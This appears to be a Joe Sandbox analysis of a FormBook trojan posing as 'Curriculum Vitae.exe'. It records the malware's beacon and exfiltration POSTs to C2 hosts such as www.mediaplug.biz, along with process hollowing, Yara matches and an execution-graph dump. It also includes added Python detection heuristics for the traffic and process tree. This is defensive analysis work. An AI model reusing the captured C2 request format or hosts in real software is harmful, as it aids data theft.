                    Session ID:9
                    Source IP:192.168.2.5
                    Source Port:55093
                    Destination IP:66.81.203.200
                    Destination Port:80
                    PID:6584
                    Process:C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp:Aug 29, 2024 12:16:21.346313000 CEST
                    Bytes transferred:759
                    Direction:OUT
                    Data:POST /13ne/ HTTP/1.1
                    Host: www.mediaplug.biz
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.mediaplug.biz
                    Cache-Control: max-age=0
                    Content-Length: 209
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.mediaplug.biz/13ne/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 37 6e 70 44 76 63 50 79 77 75 6e 43 4a 6a 52 42 59 4f 34 4f 55 73 76 47 63 64 79 38 35 37 61 39 68 46 37 4c 6f 2b 6b 6d 71 49 41 38 4a 35 68 37 72 70 4f 77 39 65 6f 65 58 55 32 31 43 4e 56 30 36 63 74 48 50 6e 5a 52 32 45 78 54 59 36 32 4b 35 56 44 75 43 79 34 32 72 66 51 47 75 46 4b 38 4b 33 37 30 58 72 43 34 61 78 76 37 6a 74 35 6a 33 71 41 46 44 4d 77 51 5a 6b 44 61 33 4b 6c 56 70 55 71 45 33 74 36 51 47 69 70 6a 2f 79 31 61 6e 58 62 55 51 4a 4d 6f 58 76 50 53 46 2b 63 37 71 48 7a 72 38 72 72 36 35 42 34 67 79 6c 6c 4d 34 6c 4f 69 4b 50 6f 63 6c 42 62 75 43 61 5a 65 57 35 45 32 54 79 4d 3d
                    Data Ascii: QpGDsvFp=7npDvcPywunCJjRBYO4OUsvGcdy857a9hF7Lo+kmqIA8J5h7rpOw9eoeXU21CNV06ctHPnZR2ExTY62K5VDuCy42rfQGuFK8K370XrC4axv7jt5j3qAFDMwQZkDa3KlVpUqE3t6QGipj/y1anXbUQJMoXvPSF+c7qHzr8rr65B4gyllM4lOiKPoclBbuCaZeW5E2TyM=


                    Session ID:10
                    Source IP:192.168.2.5
                    Source Port:55094
                    Destination IP:66.81.203.200
                    Destination Port:80
                    PID:6584
                    Process:C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp:Aug 29, 2024 12:16:23.901017904 CEST
                    Bytes transferred:779
                    Direction:OUT
                    Data:POST /13ne/ HTTP/1.1
                    Host: www.mediaplug.biz
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.mediaplug.biz
                    Cache-Control: max-age=0
                    Content-Length: 229
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.mediaplug.biz/13ne/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 37 6e 70 44 76 63 50 79 77 75 6e 43 49 43 68 42 61 76 34 4f 52 4d 76 42 41 4e 79 38 69 72 61 35 68 46 6e 4c 6f 2f 67 32 71 37 6b 38 4a 5a 52 37 73 6f 4f 77 77 2b 6f 65 63 30 32 77 66 64 56 6a 36 63 70 35 50 6e 6c 52 32 46 56 54 59 2f 79 4b 35 6d 62 68 44 69 34 4f 2f 76 51 45 74 31 4b 38 4b 33 37 30 58 76 71 53 61 78 6e 37 6a 38 70 6a 6c 62 41 45 4b 73 77 58 50 30 44 61 6d 61 6c 72 70 55 71 69 33 73 57 2b 47 67 52 6a 2f 32 78 61 70 69 33 56 5a 4a 4d 55 61 50 4f 4f 42 4e 74 67 72 6e 62 56 34 62 61 69 75 43 4a 61 36 7a 49 6d 69 48 47 4b 5a 76 45 6b 31 53 54 5a 54 71 34 33 4d 61 55 47 4e 6c 61 56 38 6b 51 54 6e 6c 52 7a 35 74 4d 78 33 66 4a 63 51 39 36 6f
                    Data Ascii: QpGDsvFp=7npDvcPywunCIChBav4ORMvBANy8ira5hFnLo/g2q7k8JZR7soOww+oec02wfdVj6cp5PnlR2FVTY/yK5mbhDi4O/vQEt1K8K370XvqSaxn7j8pjlbAEKswXP0DamalrpUqi3sW+GgRj/2xapi3VZJMUaPOOBNtgrnbV4baiuCJa6zImiHGKZvEk1STZTq43MaUGNlaV8kQTnlRz5tMx3fJcQ96o


                    Session ID:11
                    Source IP:192.168.2.5
                    Source Port:55095
                    Destination IP:66.81.203.200
                    Destination Port:80
                    Timestamp:Aug 29, 2024 12:16:27.081561089 CEST
                    Bytes transferred:1796
                    Direction:OUT
                    Data:POST /13ne/ HTTP/1.1
                    Host: www.mediaplug.biz
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.mediaplug.biz
                    Cache-Control: max-age=0
                    Content-Length: 1245
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.mediaplug.biz/13ne/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 37 6e 70 44 76 63 50 79 77 75 6e 43 49 43 68 42 61 76 34 4f 52 4d 76 42 41 4e 79 38 69 72 61 35 68 46 6e 4c 6f 2f 67 32 71 37 73 38 4a 49 78 37 73 4c 6d 77 78 2b 6f 65 52 55 32 78 66 64 56 62 36 64 4e 39 50 6e 70 65 32 47 39 54 5a 5a 4f 4b 77 33 62 68 4e 69 34 4f 67 2f 51 4a 75 46 4b 70 4b 33 71 7a 58 72 47 53 61 78 6e 37 6a 2f 42 6a 31 61 41 45 4d 73 77 51 5a 6b 44 47 33 4b 6b 47 70 55 7a 5a 33 73 69 41 47 51 78 6a 2b 53 56 61 72 55 6a 56 57 4a 4d 57 4a 2f 4f 47 42 4e 68 46 72 68 2b 6d 34 62 65 49 75 43 78 61 70 53 4e 77 33 6e 4f 53 41 38 63 51 68 52 4c 63 4f 2f 67 43 44 73 45 72 45 47 4f 36 68 32 59 48 79 6a 64 2f 7a 73 5a 45 6f 34 31 4d 58 71 53 70 47 5a 69 37 63 6c 66 61 64 49 50 51 62 4d 69 36 42 51 30 6f 52 50 6f 4c 2f 2b 6e 37 44 7a 79 38 4a 33 59 72 67 51 32 53 6c 42 4a 51 39 68 76 7a 55 71 63 48 73 63 42 62 38 42 53 2b 33 53 49 45 31 70 2f 4c 6b 51 54 77 38 44 35 2f 47 78 4f 49 35 37 58 36 4e 68 38 43 7a 51 65 56 68 76 55 62 4c 68 64 77 74 59 72 5a 37 63 36 46 4c [TRUNCATED]
                    Data Ascii: QpGDsvFp= [TRUNCATED]
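The five sessions above are the FormBook check-in traffic: the same hand-built header set on every request, a one-segment path (/2b9b/, /13ne/), Origin and Referer forged to match the target host, and a single form field (QpGDsvFp) or query parameter carrying an unencoded base64 blob. The first host, www.godoggyonbase.online, answered with a Hostinger parked-domain page, so the request itself is the signal, not the response. The Python below is an added example and is not part of the Joe Sandbox report. It turns those traits into a scoring function and runs it over request records; the first two records are rebuilt from sessions 9 and 8 above (headers, paths and payloads copied verbatim), the third is a constructed ordinary browser login with a hypothetical host for contrast. The HttpRequest class, the indicator names, the path regex and the cutoff of three co-occurring traits are my own.

```python
"""FormBook-style HTTP beacon heuristics (added example, not report code)."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# User-Agent sent by every request in the captured sessions.
FORMBOOK_UA = (
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; "
    ".NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)"
)
# C2 paths in the capture are one short alphanumeric segment: /2b9b/, /13ne/.
SHORT_PATH = re.compile(r"^/[a-z0-9]{3,5}/$")
# Shape check only: captured bodies may be truncated, so no strict decode.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


@dataclass
class HttpRequest:
    method: str
    host: str
    target: str                      # request-target: path plus optional query
    headers: dict = field(default_factory=dict)
    body: str = ""


def split_params(raw: str) -> list[tuple[str, str]]:
    """Split a query/form string WITHOUT percent-decoding. FormBook sends its
    base64 unencoded, and urllib.parse.parse_qsl would turn '+' into ' '."""
    out = []
    for part in raw.split("&"):
        if part:
            key, _, value = part.partition("=")
            out.append((key, value))
    return out


def beacon_indicators(req: HttpRequest) -> list[str]:
    """Return the FormBook-style traits present in one request."""
    hits = []
    h = {k.lower(): v for k, v in req.headers.items()}
    ua = h.get("user-agent", "")
    url = urlparse(req.target)
    if ua == FORMBOOK_UA:
        hits.append("hardcoded MSIE 8 / Avant Browser User-Agent")
    if SHORT_PATH.match(url.path):
        hits.append("short single-segment C2 path")
    # Origin and Referer are forged to look like a same-site form post.
    origin = "http://" + req.host
    if h.get("origin") == origin and h.get("referer") == origin + url.path:
        hits.append("self-referencing Origin/Referer")
    # IE 8 never advertised Brotli or AVIF: modern Accept headers under an
    # MSIE User-Agent mean the headers were hand-built, not browser-generated.
    encodings = {t.strip() for t in h.get("accept-encoding", "").split(",")}
    if "MSIE" in ua and ("br" in encodings or "image/avif" in h.get("accept", "")):
        hits.append("Accept headers inconsistent with claimed browser")
    # Beacon/exfil payload: exactly one form field holding a long base64 blob.
    if req.method == "POST" and h.get("content-type") == "application/x-www-form-urlencoded":
        params = split_params(req.body)
        if len(params) == 1 and B64_BLOB.fullmatch(params[0][1]):
            hits.append("single-field base64 form body")
    elif req.method == "GET":
        params = split_params(url.query)
        if params and B64_BLOB.fullmatch(params[0][1]):
            hits.append("base64 blob in first query parameter")
    return hits


def is_formbook_beacon(req: HttpRequest, threshold: int = 3) -> bool:
    # Flag when at least `threshold` independent traits co-occur (my own cutoff).
    return len(beacon_indicators(req)) >= threshold


# Constructed records: sessions 9 and 8 from the report, then a plain browser
# login POST against a hypothetical host for contrast.
COMMON = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US",
    "Connection": "close",
    "User-Agent": FORMBOOK_UA,
}
SAMPLE_REQUESTS = [
    HttpRequest("POST", "www.mediaplug.biz", "/13ne/", {
        **COMMON,
        "Accept-Encoding": "gzip, deflate, br",
        "Origin": "http://www.mediaplug.biz",
        "Cache-Control": "max-age=0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://www.mediaplug.biz/13ne/",
    }, body="QpGDsvFp=7npDvcPywunCJjRBYO4OUsvGcdy857a9hF7Lo+kmqIA8J5h7rpOw9eoeXU21CNV06ctHPnZR2ExTY62K5VDuCy42rfQGuFK8K370XrC4axv7jt5j3qAFDMwQZkDa3KlVpUqE3t6QGipj/y1anXbUQJMoXvPSF+c7qHzr8rr65B4gyllM4lOiKPoclBbuCaZeW5E2TyM="),
    HttpRequest("GET", "www.godoggyonbase.online",
                "/2b9b/?QpGDsvFp=ZHAZUszVkZojOh6l4QgRWsOseo6gnr5+/9v7uoYYl6Pb3zYSipzXXNStKfhRGhUQf6Tergy2VCT+UWp4uEi/6TdO8TzwggtBmSoW3KZOjFFDDhjE/y85QqgGs38SMRVr8g==&en=KRMtj8Zx1f-",
                dict(COMMON)),
    HttpRequest("POST", "example.com", "/login", {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/127.0 Safari/537.36",
        "Origin": "https://example.com",
        "Referer": "https://example.com/login",
        "Content-Type": "application/x-www-form-urlencoded",
    }, body="user=alice&pass=hunter2&csrf=8f1c2a"),
]
```

Run on the three records, the two FormBook requests score 5 and 4 traits and the browser login scores 0; the Accept/Accept-Encoding check is the most portable of the five, because it survives a change of C2 path, host and form-field name.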



                    Target ID:0
                    Start time:06:14:21
                    Start date:29/08/2024
                    Path:C:\Users\user\Desktop\Curriculum Vitae.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Curriculum Vitae.exe"
                    Imagebase:0xd30000
                    File size:1'268'224 bytes
                    MD5 hash:EDA3B2C20013E6A58D10AD852D39FD29
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:06:14:29
                    Start date:29/08/2024
                    Path:C:\Windows\SysWOW64\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Curriculum Vitae.exe"
                    Imagebase:0x810000
                    File size:46'504 bytes
                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:06:15:16
                    Start date:29/08/2024
                    Path:C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe"
                    Imagebase:0xe90000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:6
                    Start time:06:15:19
                    Start date:29/08/2024
                    Path:C:\Windows\SysWOW64\regsvr32.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\regsvr32.exe"
                    Imagebase:0x560000
                    File size:20'992 bytes
                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:7
                    Start time:06:15:32
                    Start date:29/08/2024
                    Path:C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe"
                    Imagebase:0xe90000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:8
                    Start time:06:15:44
                    Start date:29/08/2024
                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Imagebase:0x7ff79f9e0000
                    File size:676'768 bytes
                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true
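The process list above gives a hunting query three things to key on: svchost.exe (Target ID 2) is recorded with the dropper's command line, which is what a hollowed or replaced process looks like; regsvr32.exe (Target ID 6) is started with no arguments yet carries FormBook Yara hits in memory; and the payload (Target IDs 5 and 7) lives directly under a 66-character random directory in Program Files (x86). The Python below is an added example and is not part of the Joe Sandbox report. It encodes those three checks and runs them over process records reconstructed from the Target ID entries on this page (paths and command lines copied verbatim). The Process class, the 40-character cutoff for a random directory name and the inclusion of rundll32.exe next to regsvr32.exe are my own assumptions.

```python
"""Process-tree heuristics (added example, not report code)."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class Process:
    target_id: int
    path: str        # image path as recorded by the sandbox
    cmdline: str     # command line as recorded by the sandbox


SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
PROGRAM_FILES = {r"c:\program files", r"c:\program files (x86)"}
# LOLBins that always take an argument when used legitimately (assumed set).
ARG_REQUIRED = {"regsvr32.exe", "rundll32.exe"}
# A junk directory name: one long mixed-case alphanumeric token, no spaces.
RANDOM_DIR = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z0-9]{40,}$")


def split_cmdline(cmdline: str) -> tuple[str, str]:
    """Return (executable, rest). Handles the quoted form the sandbox records;
    an unquoted path containing spaces would be cut at the first space."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end > 0:
            return s[1:end], s[end + 1:].strip()
        return s[1:], ""
    exe, _, rest = s.partition(" ")
    return exe, rest.strip()


def process_anomalies(p: Process) -> list[str]:
    """Return the anomalies one process record exhibits."""
    hits = []
    image = PureWindowsPath(p.path)
    exe, args = split_cmdline(p.cmdline)
    claimed = PureWindowsPath(exe)
    image_dir = str(image.parent).lower()
    # 1. Image and command line name different executables (the svchost.exe
    #    record above carries the dropper's command line). Case-insensitive,
    #    because the sandbox itself records firefox.exe with two spellings.
    if claimed.name.lower() != image.name.lower():
        hits.append("image/command-line mismatch")
    # 2. A system LOLBin started bare, as regsvr32.exe is above.
    if image.name.lower() in ARG_REQUIRED and image_dir in SYSTEM_DIRS and not args:
        hits.append(f"{image.name.lower()} started without arguments")
    # 3. Executable directly under a random-looking directory in Program Files.
    if str(image.parent.parent).lower() in PROGRAM_FILES and RANDOM_DIR.match(image.parent.name):
        hits.append("random directory under Program Files")
    return hits


def flagged(processes) -> dict[int, list[str]]:
    """Map target id -> anomalies for every record that has at least one."""
    return {p.target_id: a for p in processes if (a := process_anomalies(p))}


# Reconstructed from the "Target ID" entries above.
SAMPLE_PROCESSES = [
    Process(0, r"C:\Users\user\Desktop\Curriculum Vitae.exe",
            r'"C:\Users\user\Desktop\Curriculum Vitae.exe"'),
    Process(2, r"C:\Windows\SysWOW64\svchost.exe",
            r'"C:\Users\user\Desktop\Curriculum Vitae.exe"'),
    Process(5, r"C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe",
            r'"C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe"'),
    Process(6, r"C:\Windows\SysWOW64\regsvr32.exe", r'"C:\Windows\SysWOW64\regsvr32.exe"'),
    Process(8, r"C:\Program Files\Mozilla Firefox\firefox.exe",
            r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]

if __name__ == "__main__":
    for tid, anomalies in flagged(SAMPLE_PROCESSES).items():
        print(tid, anomalies)
```

Targets 2, 5 and 6 are flagged, the dropper itself (Target 0) and Firefox (Target 8) are not; the same three checks apply unchanged to Sysmon event ID 1 or EDR process-creation records, which carry the same image-path and command-line fields.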


                      Execution Graph

                      Execution Coverage:3.5%
                      Dynamic/Decrypted Code Coverage:0.4%
                      Signature Coverage:5%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:69
                      execution_graph: node data of the rendered call graph omitted. Windows APIs named on the visible nodes: RegOpenKeyExW, RegQueryValueExW, RegCloseKey, LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, RtlAllocateHeap, RaiseException, VariantClear, EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx.
96657 d73d1d 96655->96657 96667 d34fdc 96655->96667 96747 d342a2 CreateStreamOnHGlobal 96656->96747 96758 da304d 74 API calls 96657->96758 96660 d73d22 96662 d3511f 64 API calls 96660->96662 96661 d350f5 40 API calls 96661->96667 96663 d73d45 96662->96663 96664 d350f5 40 API calls 96663->96664 96666 d3506e ISource 96664->96666 96666->96513 96667->96660 96667->96661 96667->96666 96753 d3511f 96667->96753 96669 d35107 96668->96669 96670 d73d70 96668->96670 96780 d5e8c4 96669->96780 96673 da28fe 96922 da274e 96673->96922 96675 da2919 96675->96521 96679 d5e536 BuildCatchObjectHelperInternal 96676->96679 96677 d5e544 96701 d5f2d9 20 API calls _abort 96677->96701 96679->96677 96681 d5e574 96679->96681 96680 d5e549 96702 d627ec 26 API calls __wsopen_s 96680->96702 96683 d5e586 96681->96683 96684 d5e579 96681->96684 96693 d68061 96683->96693 96703 d5f2d9 20 API calls _abort 96684->96703 96687 d5e58f 96688 d5e595 96687->96688 96689 d5e5a2 96687->96689 96704 d5f2d9 20 API calls _abort 96688->96704 96705 d5e5d4 LeaveCriticalSection __fread_nolock 96689->96705 96691 d5e554 __wsopen_s 96691->96645 96694 d6806d BuildCatchObjectHelperInternal 96693->96694 96706 d62f5e EnterCriticalSection 96694->96706 96696 d6807b 96707 d680fb 96696->96707 96700 d680ac __wsopen_s 96700->96687 96701->96680 96702->96691 96703->96691 96704->96691 96705->96691 96706->96696 96716 d6811e 96707->96716 96708 d68088 96720 d680b7 96708->96720 96709 d68177 96725 d64c7d 96709->96725 96714 d68189 96714->96708 96738 d63405 11 API calls 2 library calls 96714->96738 96716->96708 96716->96709 96723 d5918d EnterCriticalSection 96716->96723 96724 d591a1 LeaveCriticalSection 96716->96724 96717 d681a8 96739 d5918d EnterCriticalSection 96717->96739 96743 d62fa6 LeaveCriticalSection 96720->96743 96722 d680be 96722->96700 96723->96716 96724->96716 96730 d64c8a pre_c_initialization 96725->96730 96726 d64cca 96741 d5f2d9 20 API calls _abort 96726->96741 96727 d64cb5 RtlAllocateHeap 96728 d64cc8 96727->96728 96727->96730 
96732 d629c8 96728->96732 96730->96726 96730->96727 96740 d54ead 7 API calls 2 library calls 96730->96740 96733 d629d3 RtlFreeHeap 96732->96733 96734 d629fc _free 96732->96734 96733->96734 96735 d629e8 96733->96735 96734->96714 96742 d5f2d9 20 API calls _abort 96735->96742 96737 d629ee GetLastError 96737->96734 96738->96717 96739->96708 96740->96730 96741->96728 96742->96737 96743->96722 96745 d4fddb 22 API calls 96744->96745 96746 d35734 96745->96746 96746->96655 96748 d342d9 96747->96748 96749 d342bc FindResourceExW 96747->96749 96748->96667 96749->96748 96750 d735ba LoadResource 96749->96750 96750->96748 96751 d735cf SizeofResource 96750->96751 96751->96748 96752 d735e3 LockResource 96751->96752 96752->96748 96754 d73d90 96753->96754 96755 d3512e 96753->96755 96759 d5ece3 96755->96759 96758->96660 96762 d5eaaa 96759->96762 96761 d3513c 96761->96667 96765 d5eab6 BuildCatchObjectHelperInternal 96762->96765 96763 d5eac2 96775 d5f2d9 20 API calls _abort 96763->96775 96765->96763 96766 d5eae8 96765->96766 96777 d5918d EnterCriticalSection 96766->96777 96767 d5eac7 96776 d627ec 26 API calls __wsopen_s 96767->96776 96770 d5eaf4 96778 d5ec0a 62 API calls 2 library calls 96770->96778 96772 d5eb08 96779 d5eb27 LeaveCriticalSection __fread_nolock 96772->96779 96774 d5ead2 __wsopen_s 96774->96761 96775->96767 96776->96774 96777->96770 96778->96772 96779->96774 96783 d5e8e1 96780->96783 96782 d35118 96782->96673 96784 d5e8ed BuildCatchObjectHelperInternal 96783->96784 96785 d5e925 __wsopen_s 96784->96785 96786 d5e900 ___scrt_fastfail 96784->96786 96787 d5e92d 96784->96787 96785->96782 96810 d5f2d9 20 API calls _abort 96786->96810 96796 d5918d EnterCriticalSection 96787->96796 96789 d5e937 96797 d5e6f8 96789->96797 96792 d5e91a 96811 d627ec 26 API calls __wsopen_s 96792->96811 96796->96789 96800 d5e70a ___scrt_fastfail 96797->96800 96803 d5e727 96797->96803 96798 d5e717 96885 d5f2d9 20 API calls _abort 96798->96885 96800->96798 96800->96803 96808 d5e76a __fread_nolock 
96800->96808 96801 d5e71c 96886 d627ec 26 API calls __wsopen_s 96801->96886 96812 d5e96c LeaveCriticalSection __fread_nolock 96803->96812 96804 d5e886 ___scrt_fastfail 96888 d5f2d9 20 API calls _abort 96804->96888 96808->96803 96808->96804 96813 d5d955 96808->96813 96820 d68d45 96808->96820 96887 d5cf78 26 API calls 4 library calls 96808->96887 96810->96792 96811->96785 96812->96785 96814 d5d976 96813->96814 96815 d5d961 96813->96815 96814->96808 96889 d5f2d9 20 API calls _abort 96815->96889 96817 d5d966 96890 d627ec 26 API calls __wsopen_s 96817->96890 96819 d5d971 96819->96808 96821 d68d57 96820->96821 96822 d68d6f 96820->96822 96900 d5f2c6 20 API calls _abort 96821->96900 96824 d690d9 96822->96824 96829 d68db4 96822->96829 96916 d5f2c6 20 API calls _abort 96824->96916 96825 d68d5c 96901 d5f2d9 20 API calls _abort 96825->96901 96828 d690de 96917 d5f2d9 20 API calls _abort 96828->96917 96830 d68d64 96829->96830 96832 d68dbf 96829->96832 96836 d68def 96829->96836 96830->96808 96902 d5f2c6 20 API calls _abort 96832->96902 96833 d68dcc 96918 d627ec 26 API calls __wsopen_s 96833->96918 96835 d68dc4 96903 d5f2d9 20 API calls _abort 96835->96903 96839 d68e08 96836->96839 96840 d68e2e 96836->96840 96841 d68e4a 96836->96841 96839->96840 96875 d68e15 96839->96875 96904 d5f2c6 20 API calls _abort 96840->96904 96907 d63820 21 API calls 2 library calls 96841->96907 96843 d68e33 96905 d5f2d9 20 API calls _abort 96843->96905 96845 d68e61 96848 d629c8 _free 20 API calls 96845->96848 96851 d68e6a 96848->96851 96849 d68e3a 96906 d627ec 26 API calls __wsopen_s 96849->96906 96850 d68fb3 96853 d69029 96850->96853 96856 d68fcc GetConsoleMode 96850->96856 96854 d629c8 _free 20 API calls 96851->96854 96855 d6902d ReadFile 96853->96855 96857 d68e71 96854->96857 96858 d69047 96855->96858 96859 d690a1 GetLastError 96855->96859 96856->96853 96860 d68fdd 96856->96860 96861 d68e96 96857->96861 96862 d68e7b 96857->96862 96858->96859 96865 d6901e 96858->96865 96863 d69005 96859->96863 96864 
